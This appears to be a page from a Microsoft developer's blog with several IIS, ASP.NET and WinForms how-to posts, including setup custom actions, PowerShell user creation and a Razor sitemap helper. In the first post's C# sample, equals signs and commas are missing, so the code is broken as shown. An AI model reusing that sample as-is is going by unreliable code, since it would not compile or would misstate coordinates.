Posts
  • CarlosAg Blog

    The evil WinForms Splitter

    • 1 Comments
    Beware of SplitPosition.
    Today I spent quite some time debugging an issue in the new product I am working on.
    Well, to summarize what I was seeing in our UI is that for some reason certain information that I was expecting to be there when a TreeNode was expanded, it just wasn’t there. It was completely surprising to me, since in that particular code path, we do not start multiple threads or use Application.DoEvents nor anything like that, basically all we do is a simple assignment in the TreeView after select event, something like:

            private void OnTreeViewAfterSelect(object sender, TreeViewEventArgs e) {
                _myObject = DoSomeProcessing();
            }
     
    However, for some reason in another event handler of our TreeView, _myObject was not set. How can this be?
     
    Well, after quite some interesting time with VS 2005 (which rocks!), the problem was due to an interesting raise condition caused by (believe it or not) a WinForms Splitter. What was happening is that DoSomeProcessing changed some properties, that caused the UI to perform a layout and inside that code, we set the SplitterPosition property of the Splitter. Well, surprise-surprise, Splitter calls Application.DoEvents in its property setter!!!.
    What DoEvents does is basically lets Windows pop the next message from the windows message pump and process it, so the next event was actually fired, and _myObject ended up not being set.
     
    To illustrate the problem with a simple sample, try this code:
    (Just copy the code and paste it into notepad.
    Save it as TestApp.cs and compile it using “csc.exe /target:winexe TestApp.cs”
    )
     
    using System;
    using 
    System.Drawing;
    using 
    System.Threading;
    using 
    System.Windows.Forms;

    namespace 
    TestApp {
        
    public class Form1 : Form {

            
    private TreeView _treeView;
            private 
    Label _label;
            private 
    Splitter _splitter;
            private 
    Button _someButton;
            
            
    [STAThread]
            
    static void Main() {
                Application.Run(
    new Form1());
            
    }

            
    public Form1() {
                InitializeComponent()
    ;

                
    // Just add some nodes...
                
    TreeNode node _treeView.Nodes.Add("Node 1");
                
    node.Nodes.Add("Node 1.1");
                
    node.Nodes.Add("Node 1.2");
                
    _treeView.Nodes.Add("Node 2");
            
    }

            
    private void InitializeComponent() {
                _treeView 
    = new TreeView();
                
    _splitter = new Splitter();
                
    _label = new Label();
                
    _someButton = new Button();

                
    SuspendLayout();

                
    // treeView1
                
    _treeView.Dock DockStyle.Left;
                
    _treeView.Location = new Point(528);
                
    _treeView.TabIndex 1;
                
    _treeView.AfterSelect += new TreeViewEventHandler(OnTreeViewAfterSelect);
                
    _treeView.BeforeSelect += new TreeViewCancelEventHandler(OnTreeViewBeforeSelect);
                
                
    // splitter
                
    _splitter.Location = new Point(12628);
                
    _splitter.TabIndex 1;
                
    _splitter.TabStop = false;
                
                
    // label1
                
    _label.BackColor SystemColors.Window;
                
    _label.BorderStyle BorderStyle.Fixed3D;
                
    _label.Dock DockStyle.Fill;
                
    _label.Location = new Point(12928);
                
    _label.TabIndex 2;
                
                
    // button1
                
    _someButton.Dock DockStyle.Top;
                
    _someButton.Location = new Point(55);
                
    _someButton.TabIndex 0;
                
                
    // Form 
                
    ClientSize = new Size(500400);
                
    Controls.Add(_label);
                
    Controls.Add(_splitter);
                
    Controls.Add(_treeView);
                
    Controls.Add(_someButton);
                
    ResumeLayout(false);
            
    }

            
    private void OnTreeViewAfterSelect(object sender, TreeViewEventArgs e) {
                _label.Text 
    "Node selected:" + e.Node.Text;
            
    }

            
    private void OnTreeViewBeforeSelect(object sender, TreeViewCancelEventArgs e) {
                
    // Just sleep 500ms to simulate some work
                
    Thread.Sleep(500);

                
    // Now update the SplitPosition
                
    _splitter.SplitPosition 100;

                
    // simulate 500ms of more work ...
                
    Thread.Sleep(500);
            
    }
        }
    }

    Colorized by: CarlosAg.CodeColorizer  


     
    Run it and select the TreeView, notice how ugly everything works.
    Basically every time you select a different node you will get an ugly flickering, getting to see how selection jumps from the newly selected node to the last selected node, and then back to the new selected node.
     
    Well, luckily in Visual Studio 2005, there is a new class called SplitContainer that simplifies everything.
    It even adds new features, such as letting you set a MaxSize for both the left panel and the right panel, and many more features. Best of all, there is no Application.DoEvents in their code, so you can have code that behaves deterministically.
    Bottom line, you do want to use SplitContainer if at all possible.  
  • CarlosAg Blog

    Using the SEO Toolkit to generate a Sitemap of a remote Web Site

    • 3 Comments

    The SEO Toolkit includes a set of features (like Robots Editor and Sitemap Editor) that only work when you are working with a local copy of your Web Site. The reason behind it is that we have to understand where we need to save the files that we need to generate (like Robots.txt and Sitemap XML files) without having to ask for physical paths as well as to verify that the functionality is added correctly such as only allowing Robots.txt in the root of a site, etc. Unfortunately this means that if you have a remote server that you cannot have a running local copy then you cannot use those features. (Note that you can still use Site Analysis tool since that will crawl your Web Site regardless of platform or framework and will store the report locally just fine.)

    The Good News

    The good news is that you can technically trick the SEO Toolkit into thinking you have a working copy locally and allow you to generate the Sitemap or Robots.txt file without too much hassle (“too much” being the key).

    For this sample, lets assume we want to create a Sitemap from a remote Web site, in this case I will use my own Web site (http://www.carlosag.net/ , but you can specify your own Web site, below are the steps you need to follow to enable those features for any remote Web site (even if it is running in other versions of IIS or any other Web Server).

    Create a Fake Site

    • Open IIS Manager (Start Menu->InetMgr.exe)
    • Expand the Tree until you can see the “Sites” node.
    • Right-click the “Sites” node and select “Add Web Site…”
    • Specify a Name (in my case I’ll use MySite)
    • Click “Select” to choose the DefaultAppPool from the Application Pool list. This will avoid creating an additional AppPool that will never run.
    • Specify a Physical Path where you will want the Robots and Sitemap files to be saved. I recommend creating just a temporary directory that clearly states this is a fake site. So I will choose c:\FakeSite\ for that.
    • Important. Set the Host name so that it matches your Web Site, for example in my case www.carlosag.net.
    • Uncheck the “Start Web site immediately”, since we do not need this to run.
    • Click OK

    This is how my Create site dialog looks like:

    image

    Use the Sitemap Editor

    Since we have a site that SEO Toolkit thinks it is locally now you should be able to use the features as usual.

    • Select the new site created above in the Tree
    • Double-click the Search Engine Optimization icon in the Home page
    • Click the link “Create a new Sitemap”
    • Specify a name, in my case Sitemap.xml
    • Since this is a remote site, you will see that the physical location option shows an empty list, so change the “URL structure” to will use the “<Run new Site Analysis>..” or if you already have one you can choose that.
    • If creating a new one, just specify a name and click OK (I will use MySite). At this point the SEO Toolkit starts crawling the Remote site to discover links and URLs, when it is done it will present you the virtual namespace structure so you can work with.
    • After the crawling is done, you can now check any files you want to include in your Sitemap and leverage the Server response to define the changed date and all the features as if the content was local. and Click OK

    This is the way the dialog looks when discovered my remote Web site URLs:

    image

    You will find your Sitemap.xml generated in the physical directory specified when creating the site (in my case c:\FakeSite\Sitemap.xml").

    Use the Robots Editor

    Just as with the Sitemap Editor, once you prepare a fake site for the remote server, you should be able to use the Robots Editor and leverage the same Site analysis output to build your Robots.txt file.

    image

    Summary

    In this blog I show how you can use the Sitemap and Robots Editor included in the SEO Toolkit when working with remote Web sites that might be running in different platforms or different versions of IIS.

  • CarlosAg Blog

    Razor Migration Notes 1: Moving a SitemapPath Control to ASP.NET Web Pages

    • 2 Comments

    After many years I decided that it is time to rewrite my Web site using Razor. A bit of history, I started it around 2003 using ASP.NET 1.1. When .NET 2.0 came around in 2005 I migrated to it and it was great being able to leverage features like MasterPages, Themes, Sitemaps, and many other features. Honestly it is a pretty simple Web site, with mostly content, so very few controls, Sitemap, my own custom Menu control, and a couple more. Last week it was moved to use .NET 4.0 and it feels its about time to go back and update it a bit, both in look and features. So this (if time permits) will be the first of a series of migration notes that I discover as I move it to use ASP.NET Razor (aka WebPages). Do note that this is not meant to be a best practice in anyway, I would never claim I can make such a thing, these will be only my personal notes as I discover more details in ASP.NET WebPages features and as I move my own implementation to use them.

    So with that, one of the first things I faced during this migration, was the use of a Sitemap control (asp:SiteMapPath) in my MasterPage (future post about moving from MasterPages coming). I knew about Sitemap API, so I just decided to write a simple Sitemap helper that I can now use anywhere in Razor. The code is pretty simple, it basically generates an unordered list of links using <ul> and <li> with <a> inside, and used CSS to layout them in a way that I liked.

    SitemapPath Control in WebForms

    The original code I was using in my MasterPage looked like the following:

    <asp:SiteMapPath CssClass="HeaderText" runat="server" ID="siteMap" ShowToolTips="true" NodeStyle-ForeColor="White" CurrentNodeStyle-Font-Bold="true" />

    And generated the following markup:

    <span id="siteMap" class="HeaderText"><a href="#siteMap_SkipLink"><img alt="Skip Navigation Links" height="0" width="0" src="http://blogs.msdn.com/WebResource.axd?d=S2jbW9E-HYlS0UQoRCcsm94KUJelFI6yS-CQIkFvzT6fyMF-zCI4oIF9bSrGjIv4IvVLF9liJbz7Om3voRpNZ8yQbW3z1KfqYr4e-0YYpXE1&amp;t=634219272564138624" style='border-width:0px;' /></a><span><a title='Home' href='/' style='color:White;'>Home</a></span><span> &gt; </span><span><a title='Free tools for download' href='/Tools/' style='color:White;'>Tools</a></span><span> &gt; </span><span style='color:White;font-weight:bold;'>Code Translator</span><a id='siteMap_SkipLink'></a></span>

    Which looks like the following in the browser:

    image

    I used some CSS to set the color, and background and other stuff, but still to set the last item to bold required me to use a property in the Sitemap to get it to look the way I wanted.

    My Sitemap Helper in Razor

    Since I was familiar with the Sitemap API and my goal was to change as “little” as possible as part of this first migration, I decided to write a Sitemap helper that I can use in my Layout pages. The code in the Page is as simple as it gets, you just call @Helpers.Sitemap() and that’s it (added the Div below to get some context in the markup, but that was already there with the SitemapPath control anyway):

    <div class="bannerPath">
    @Helpers.Sitemap()
    </div>

    This new helper version generates the markup below. I don’t know about you, but I can sure make more sense of what it says, and I imagine Search Engines will as well, I decided to use more semantically correct markup using a <nav> to signal navigational section and use a list of links.

    <nav>
        <ul class="siteMap">
            <li><a href="http://blogs.msdn.com/" title="Home">Home</a>&nbsp;&gt;&nbsp;</li>
            <li><a href="http://blogs.msdn.com/Tools/" title="Free tools for download">Tools</a>&nbsp;&gt;&nbsp;</li>
            <li><span>Code Translator</span></li>
        </ul>
    </nav>

    And it looks like the following in the browser (I decided to remove the underlining, and have more padding, and a new font, but all of that is CSS):

    image

    The Sitemap helper code

    The code to do the Sitemap was pretty simple, just use the SiteMap API to get the current node. Since I’m picky and I wanted to generate the markup in the “right” order (note you could use CSS to float them to the right instead), I used a Stack to push the nodes while traversing them up. Finally just generate the <li>.

    @helper Sitemap()
    {
        SiteMapNode currentNode = SiteMap.CurrentNode;
        <nav>
        <ul class="siteMap">
        @if (currentNode != null)
        {
            // Push into a stack to reverse them
            var node = currentNode;
            var nodes = new Stack<SiteMapNode>();
            while (node.ParentNode != null)
            {
                nodes.Push(node.ParentNode);
                node = node.ParentNode;
            }
           
            while(nodes.Count != 0)
            {
                SiteMapNode n = nodes.Pop();
                <li><a href="@n.Url" title="@n.Description">@n.Title</a>&nbsp;&gt;&nbsp;</li>
            }
            <li><span>@currentNode.Title</span></li>
        }
        else
        {
            <li><span>@Page.Title</span></li>
        }
        </ul>
        </nav>
    }

     

    To make it look the way I wanted I used the following CSS:

    .siteMap

      { float:right; font-size:11px; color:White; display:inline; margin-top:3px; margin-bottom:3px; margin-left:0px; margin-right:10px; } .siteMap li,span { float:left; list-style-type:none; padding-left:5px; border-width:0px;} .siteMap span { font-weight:bold; } .siteMap a,a.Visited { color:White; text-decoration:none; }

     

    Conclusion

    SitemapPath control gives you a really easy way to put together a navigation control based on the Sitemap APIs (and the Web.Sitemap file in my case). Creating a simple ASP.NET Razor helper is actually pretty easy since all the functionality needed is there in the base API’s and although it required some code (20 lines of code) now I feel like I have more control over my markup, can style it in anyway I want using CSS and have cleaner markup rendered.

    I’m sure there are better ways to do this, but as I said, the goal of this first pass is to push my site soon with as little changes possible while keeping the same functionality first.

  • CarlosAg Blog

    Creating a Setup Project for IIS Extensions using Visual Studio 2008

    • 2 Comments

    Introduction

    IIS 7 provides a rich extensibility model, whether extending the server or the user interface, one critical thing is provide a simple setup application that can install all the required files, add any registration information required, and modify the server settings as required by the extension.
    Visual Studio 2008 provides a set of project types called Setup and Deployment projects specifically for this kind of applications. The output generated for these projects is an MSI that can perform several actions for you, including copying files, adding files to the GAC, adding registry keys, and many more.
    In this document we will create a setup project to install a hypothetical runtime Server Module that also includes a User Interface extension for IIS Manager.
    Our setup will basically perform the following actions:
    •    Copy the required files, including three DLL’s and an html page.
    •    Add a couple of registry keys.
    •    Add the managed assemblies to the GAC
    •    Modify applicationHost.config to register a new module
    •    Modify administration.config to register a new UI extensibility for InetMgr
    •    Create a new sample application that exposes the html pages
    •    Finally, we will remove the changes from both configuration files during uninstall

    Creating the Setup Project

    Start Visual Studio 2008. In the File Menu, select the option New Project.
    In the New Project Dialog, expand the Other Project Types option in the Project type tree view.
    Select the option Setup and Deployment type and select the option Setup Project. Enter a name for the Project and a location. I will use SampleSetup as the name.

    image

    Adding Files to the Setup

    • Select the menu View->Editor->File System. This will open the editor where you can add all the files that you need to deploy with your application. In this case I will just add an html file that I have created called readme.htm.
    • To do that, right click the Application Folder directory in the tree view and select the option Add File. Browse to your files and select all the files you want to copy to the setup folder (by default <Program Files>\<Project Name>.

    Adding assemblies to the GAC

    Adding assemblies to the setup is done in the same File System editor, however it includes a special folder called Global Assembly Cache that represents the GAC in the target system.
    In our sample we will add to the GAC the assemblies that have the runtime server module and the user interface modules for IIS Manager. I have created the following set of projects:

    1. SampleModule.dll that includes the runtime module on it.
    2. SampleModuleUI.dll that contains the server-side portion of the IIS Manager extension (ModuleProvider, ModuleService, etc).
    3. SampleModuleUIClient.dll that contains the client side portion of the IIS Manager extension (Module, ModulePage, TaskLists, etc).


    Back in Visual Studio,

    • Select the menu option View->Editor->File System
    • Right-click the root node in the Tree view titled File System on Target Machine and select the option Add Special Folder.
      Select the option Global Assembly Cache Folder.
      Right click the newly added GAC folder and choose the option Add File and browse to the DLL and choose OK. Another option is using the Add Assembly and use the "Select Component" dialog to add it.
      Visual Studio will recognize the dependencies that the assembly has, and will try to add them to the project automatically. However, certain assemblies such as Microsoft.Web.Administration, or any other System assemblies should be excluded because they will already be installed in the target machine.
    • To ensure that you don't ship system assemblies, in the Solution Explorer expand the Detected Dependencies folder and right click each of the assemblies that shouldn't be packaged and select the option Exclude. (In our case we will exclude Microsoft.Web.Administration.dll, Microsoft.Web.Management.dll, Microsoft.ManagementConsole.dll and MMCFxCommon.dll)
      After completing this, the project should look as follows:

    image

    Adding Registry Keys

    Visual Studio also includes a Registry editor that helps you adding any registry keys in the target machine. For this sample I will just add a registry key in HKEY_LOCAL_MACHINE\Software\My Company\Message. For that:
    Select the menu option View->Editor->Registry.
    Expand the HKEY_LOCAL_MACHINE node and drill down to Software\[Manufacturer].
    [Manufacturer] is a variable that holds the name of the company, and can be set by selecting the SampleSetup node in Solution Explorer and using the Property Grid to change it. There are several other variables defined such as Author, Description, ProductName, Title and Version that helps whenever dynamic text is required.
    Right click [Manufacturer] and select the option new String Value. Enter Message as the name. To set the value you can select the item in the List View and use the Property Grid to set its value.
    After completing this, the project should look as follows:

    clip_image002

    Executing Custom Code

    To support any custom code to be executed when running the setup application, Visual Studio (more explicitly MSI) supports the concept of Custom Actions. These Custom Actions include running an application, a script or executing code from a managed assembly.
    For our sample, we will create a new project where we will add all the code  to read and change configuration.
    Select the option File->Add->New Project.
    Select the Class Library template and name it SetupHelper.

    image

    • Since we will be creating a custom action, we need to add a reference to System.Configuration.Install to be able to create the custom action. Use the Project->Add Reference. And in the .NET Tab select the System.Configuration.Install and press OK.
    • Since we will also be modifying server configuration (for registering the HTTP Module in ApplicationHost.config and the ModuleProvider in administration.config) using Microsoft.Web.Administration we need to add a reference to it as well. Again use the Project->Add Reference, and browse to <windows>\system32\inetsrv and select Microsoft.Web.Administration.dll
    • Rename the file Class1.cs file to be named SetupAction.cs and make the class name SetupAction. This class needs to inherit from System.Configuration.Install.Installer which is the base class for all custom actions and it has several methods that you can override to add custom logic to the setup process. In this case we will add our code in the Install and the Uninstall method.
    using System;
    using System.ComponentModel;
    using System.Configuration.Install;

    namespace SetupHelper {
       
    [RunInstaller(true)]
       
    public class SetupAction : Installer {
           
    public override void Install(System.Collections.IDictionary stateSaver) {
               
    base.Install(stateSaver);

               
    InstallUtil.AddUIModuleProvider(
                    "SampleUIModule"
    ,
                    "SampleUIModule.SampleModuleProvider, SampleUIModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
               
    );

               
    // Add a Server Module to applicationHost.config
                InstallUtil.AddModule(
                    "SampleModule"
    ,
                    "SampleModule.SampleModule, SampleModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
               
    );

               
    // Create a web application
                InstallUtil.CreateApplication(
                    "Default Web Site"
    ,
                    "/SampleApp"
    ,
                   
    Context.Parameters["TargetDir"]
               
    );
           
    }

           
    public override void Uninstall(System.Collections.IDictionary savedState) {
               
    base.Uninstall(savedState);

               
    InstallUtil.RemoveUIModuleProvider("SampleUIModule");
               
    InstallUtil.RemoveModule("SampleModule");
               
    InstallUtil.RemoveApplication("Default Web Site", "/SampleApp");
           
    }
       
    }
    }
       

    As you can see the code above is actually really simple, it just calls helper methods in a utility class called InstallUtil that is shown at the end of this entry. You will also need to add the InstallUtil class to the project to be able to compile it. The only interesting piece of code above is how we pass the TargetDir from the Setup project to the Custom action through the Parameters property of the InstallContext type.

    Configuring the Custom Action

    To be able to use our new Custom Action we need to add the SetupHelper output to our setup project, for that:
    Select the option View->Editor->File System
    Right-click the Application Folder node and select the option Add Project Output... and select the SetupHelper project in the Project drop down.

    image

    After doing this, the DLL will be included as part of our setup.

    Adding the Install Custom Action

    Select the option View->Editor->Custom Actions
    Right-click the Install node and select the option Add Custom Action… drill down into the Application Folder and select the Primary output from SetupHelper.

    image

    Click OK and type a name such as InstallModules

    Now, since we want to pass the TargetDir variable to be used as the physical path for the web application that we will create within our Installer derived-class, select the custom action and go to the Property Grid. There is a property called CustomActionData. This property is used to pass any data to the installer parameters class, and uses the format “/<name>=<value>”. So for our example we will set it to: /TargetDir="[TARGETDIR]\"

    image

    Adding the Uninstall Custom Action

    In the same editor, right-click the Uninstall node and select the option Add Custom Action…, again drill down into the Application Folder and select the Primary output from SetupHelper.
    Press OK and type a name such as UninstallModules.
    After doing this the editor should look as follows:

    image

    Building and Testing the Setup

    Finally we can build the solution by using the Build->Rebuild Solution menu option.
    This will create a file called SampleSetup.msi, in the folder SampleSetup\SampleSetup\Debug\SampleSetup.msi
    You can now run this MSI and it will walk through the process of installing. The user interface that is provided by default can also be configured to add new steps or remove the current steps. You can also provide a Banner logo for the windows and many more options from the View->Editor->User Interface.

    clip_image002[4]clip_image002[6]

    Visual Studio provides different packaging mechanisms for the setup application. You can change it through the Project Properties dialog where you get the option to use:
    1)    As loose uncompressed files. This option packages all the files by just copying them into a file system structure where the files are copied unchanged. This is a good packaging option for CD or DVD based setups
    2)    In setup file. This option packages all the files within the MSI file
    3)    In cabinet files. This option creates a set of CAB files that can be used in scenarios such as diskette based setup.

    You can also customize all the setup properties using the property grid, such as DetectNewerInstalledVersion which will warn users if a newer version is already installed or RemovePreviousVersion that will automatically remove older versions for the user whenever he tries to install a new one.

     

    64-bit considerations

    Turns out that the managed code custom action will fail under 64-bit platform due to it being executed as a 32-bit custom action the following blog talks about the details and shows how you can fix the issue:

    http://blogs.msdn.com/heaths/archive/2006/02/01/64-bit-managed-custom-actions-with-visual-studio.aspx

     

     

    Summary

    Visual Studio 2008 provides a simple option to easily create Setup applications that can perform custom code through Custom actions. In this document we created a simple custom action to install modules and InetMgr extensions through this support.

    For the latest information about IIS 7.0, see the IIS 7 Web site at http://www.iis.net

    InstallUtil

    This is the class that is used from the SetupHelper class we created to do the actual changes in configuration. As you can see it only has six public methods, AddModule, AddUIModuleProvider, CreateApplication, RemoveApplication, RemoveModule, and RemoveUIModule. The other methods are just helper methods to facilitate reading configuration.

    using System;
    using Microsoft.Web.Administration;

    namespace SetupHelper {

       
    public static class InstallUtil {

           
    /// <summary>
            /// Registers a new Module in the Modules section inside ApplicationHost.config
            /// </summary>
            public static void AddModule(string name, string type) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                   
    ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();

                   
    if (FindByAttribute(modules, "name", name) == null) {
                       
    ConfigurationElement module = modules.CreateElement();
                       
    module.SetAttributeValue("name", name);
                       
    if (!String.IsNullOrEmpty(type)) {
                           
    module.SetAttributeValue("type", type);
                       
    }

                       
    modules.Add(module);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }

           
    public static void AddUIModuleProvider(string name, string type) {
               
    using (ServerManager mgr = new ServerManager()) {

                   
    // First register the Module Provider 
                    Configuration adminConfig = mgr.GetAdministrationConfiguration();

                   
    ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                   
    ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                   
    if (FindByAttribute(moduleProviders, "name", name) == null) {
                       
    ConfigurationElement moduleProvider = moduleProviders.CreateElement();
                       
    moduleProvider.SetAttributeValue("name", name);
                       
    moduleProvider.SetAttributeValue("type", type);
                       
    moduleProviders.Add(moduleProvider);
                   
    }

                   
    // Now register it so that all Sites have access to this module
                    ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();
                   
    if (FindByAttribute(modules, "name", name) == null) {
                       
    ConfigurationElement module = modules.CreateElement();
                       
    module.SetAttributeValue("name", name);
                       
    modules.Add(module);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }

           
    /// <summary>
            /// Create a new Web Application
            /// </summary>
            public static void CreateApplication(string siteName, string virtualPath, string physicalPath) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    Site site = mgr.Sites[siteName];
                   
    if (site != null) {
                       
    site.Applications.Add(virtualPath, physicalPath);
                   
    }
                   
    mgr.CommitChanges();
               
    }
           
    }

           
    /// <summary>
            /// Helper method to find an element based on an attribute
            /// </summary>
            private static ConfigurationElement FindByAttribute(ConfigurationElementCollection collection, string attributeName, string value) {
               
    foreach (ConfigurationElement element in collection) {
                   
    if (String.Equals((string)element.GetAttribute(attributeName).Value, value, StringComparison.OrdinalIgnoreCase)) {
                       
    return element;
                   
    }
               
    }

               
    return null;
           
    }

           
    public static void RemoveApplication(string siteName, string virtualPath) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    Site site = mgr.Sites[siteName];
                   
    if (site != null) {
                       
    Application app = site.Applications[virtualPath];
                       
    if (app != null) {
                           
    site.Applications.Remove(app);
                           
    mgr.CommitChanges();
                       
    }
                   
    }
               
    }
           
    }

           
    /// <summary>
            /// Removes the specified module from the Modules section by name
            /// </summary>
            public static void RemoveModule(string name) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                   
    ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();
                   
    ConfigurationElement module = FindByAttribute(modules, "name", name);
                   
    if (module != null) {
                       
    modules.Remove(module);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }


           
    /// <summary>
            /// Removes the specified UI Module by name
            /// </summary>
            public static void RemoveUIModuleProvider(string name) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    // First remove it from the sites
                    Configuration adminConfig = mgr.GetAdministrationConfiguration();
                   
    ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();
                   
    ConfigurationElement module = FindByAttribute(modules, "name", name);
                   
    if (module != null) {
                       
    modules.Remove(module);
                   
    }

                   
    // now remove the ModuleProvider
                    ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                   
    ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                   
    ConfigurationElement moduleProvider = FindByAttribute(moduleProviders, "name", name);
                   
    if (moduleProvider != null) {
                       
    moduleProviders.Remove(moduleProvider);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }
       
    }
    }
  • CarlosAg Blog

    Adding IIS Manager Users and Permissions using PowerShell

    • 2 Comments

    Today somebody ask in the IIS.net Forums how could they automate the process of adding IIS Manager Users and their Permissions using a script or a command line and I thought it would be useful to post something that hopefully will be easy to find and refer to.

    One way they found to do it through configuration however they were not getting the password encrypted.

    The first thing that I would like to highlight is that the password is not encrypted, it is actually stored as a hash which means just entering the password in clear text will not work the only way it will work is if  you calculate the same hash our current implementation does.

    Having said that manually adding the users is also not a good idea since the IIS Manager functionality is extensible and its storage can be replaced to store the users in SQL Server or any other backend. Our built-in implementation stores them in Administration.config but at any given time someone could have a different provider which means your code will not work either.

    So then what is the right way? Well the right way is using existing API’s we surface in Microsoft.Web.Management.dll, in particular Microsoft.Web.Management.Server.ManagementAuthentication and Microsoft.Web.Management.ManagementAuthorization. Using these API’s will make sure that it will call the right provider and pass the correct arguments ensuring that you do not have to implement or know any details about their implementation.

    These types are really easy to consume from managed code but it does mean you have to write code for it. However the good news is that through PowerShell this gets as simple as it can possibly get.

    So just launch PowerShell (make sure its in elevated as an administrator)

    Here is how you add a user and grant him access for Default Web Site:

    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.Web.Management") 
    [Microsoft.Web.Management.Server.ManagementAuthentication]::CreateUser("MyUser", "ThePassword")
    [Microsoft.Web.Management.Server.ManagementAuthorization]::Grant("MyUser", "Default Web Site", $FALSE)
  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0 release

    • 3 Comments

    Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with those versions so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features such as:

    1. Extensibility. In this version we are opening a new set of API's to allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps User Interface and more. More on this on a upcoming post.
    2. New Reports. Based on feedback we added a Redirects summary report in the Links section as well as a new Link Depth report that allows you to easily know which pages are the "most hidden pages" in your site, or in other words if a user landed at your sites home page, "how many clicks does he need to do to reach a particular page".
    3. New Routes Query. We added a new type of Query called Routes. This is the underlying data that powers the "Link Depth" report mentioned above, however it is also exposed as a new query type so that you can create your own queries to customize the Start page and any other kind of things, like filtering, grouping, etc.
    4. New option to opt-out from keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable the option of keeping the files stored locally. This allows you to run a report which runs faster and that consumes a lot less disk space than when keeping the files cached. The only side effect is that you will not be able to get the "Content" tab and the contextual position of the links as well as the Word Analysis feature. Everything else continues to work just as any other report.
    5. HTML Metadata is now stored in the Report. By leveraging the Extensibility mentioned in bullet 1, the HTML parser now stores all the HTML META tags content so that you can later use them to write your own queries, whether to filter, group data or just export it, this gives you a very interesting set of options if you have any metadata like Author, or any custom.
    6. Several Bug Fixes:
      1. Internal URLs linked by External URLs now are also included in the crawling process.
      2. Groupings in queries should be case sensitive
      3. Show contextual information (link position) in Routes
      4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
      5. Canonical URLs should support sub-domains.
      6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
      7. Several fixes for Right-To-Left languages. (Layout and UI)
      8. Help shortcuts enabled.
      9. New Context Menus for Copying content
      10. Add link position information for Canonical URLs
      11. Remove x-javascript validation for this release
      12. Robots algorithm should be case sensitive
      13. many more

    This version can upgrade both Beta 1 and Beta 2 version so go ahead and try it and PLEASE provide us with feedback and any additional things you would like to see for the next version at the SEO Forum in the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    Using IIS Manager Users Authentication in your Web Application

    • 2 Comments

    Today in the IIS.NET Forums a question was asked if it was possible to use the same IIS Manager Users authentication in the context of a Web Application so that you could have say something like WebDAV using the same credentials as you use when using IIS Manager Remote Administration.

    The IIS Manager Remote Administration allows you to connect to manage your Web Site using credentials that are not Windows Users, but instead just a combination of User and Password. This is implemented following a Provider model where the default implementation we ship uses our Administration.config file (%windir%\system32\inetsrv\config\administration.config) as the storage for this users. However, you can easily implement a base class to authentication against a database or any other users store if needed. This means you can build your own application and call our API's (ManagementAuthentication).

    Even better in the context of a Web Site running in IIS 7.0 you can actually implement this without having to write a single line of code.

    Disclaimer: Administration.config out-of-the box only has permissions for administrators to be able to read the file. This means that a Web Application will not be able to access the file, so you need to change the ACL's in the file to provide read permissions for your Application, but you should make sure that you limit the read access to the minimum required such as below.

    Here is how you do it:

    1. First make sure that your Web Site is using SSL to use this. (Use IIS Manager and right click your Web Site and Edit Bindings and add an SSL binding).
    2. So that we can restrict permissions further, make your application run in its own Application Pool, this way we can change the ACL's required to only affect your application pool and nothing else. So using IIS Manager go to Application Pools and add a new Application running in Integrated Mode, and give it a name you can easily remember, say WebMgmtAppPool (we will use this in the permissions below).
    3. Disable Anonymous Authentication in your application. (Use IIS Manager, drill-down to your application, double click the Authentication feature and disable Anonymous Authentication and any other authentication module enabled).
    4. Enable the Web Management Authentication Module in your application, you can add a Web.config file with the following contents on it:
      <configuration>
       
      <system.webServer>
         
      <modules>
           
      <add name='WebManagementBasicAuthentication' 
                 type
      ='Microsoft.Web.Management.Server.WebManagementBasicAuthenticationModule, Microsoft.Web.Management, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' />
          </
      modules>
       
      </system.webServer> 
      </configuration> 
    5. Modify the ACL's in the required configuration files:
      1. Give read access to the config directory so we can access the files using the following command line (note that we are only giving permissions to the Application Pool)
        icacls %windir%\system32\inetsrv\config /grant "IIS AppPool\WebMgmtAppPool":(R)
      2. Give read access to the redirection.config:
        icacls %windir%\system32\inetsrv\config\redirection.config /grant "IIS AppPool\WebMgmtAppPool":(R)
      3. Finally give read access to administration.config:
        icacls %windir%\system32\inetsrv\config\administration.config /grant "IIS AppPool\WebMgmtAppPool":(R)
    6. At this point you should be able to navigate to your application using any browser and you should get a prompt for credentials that will be authenticated against the IIS Manager Users.

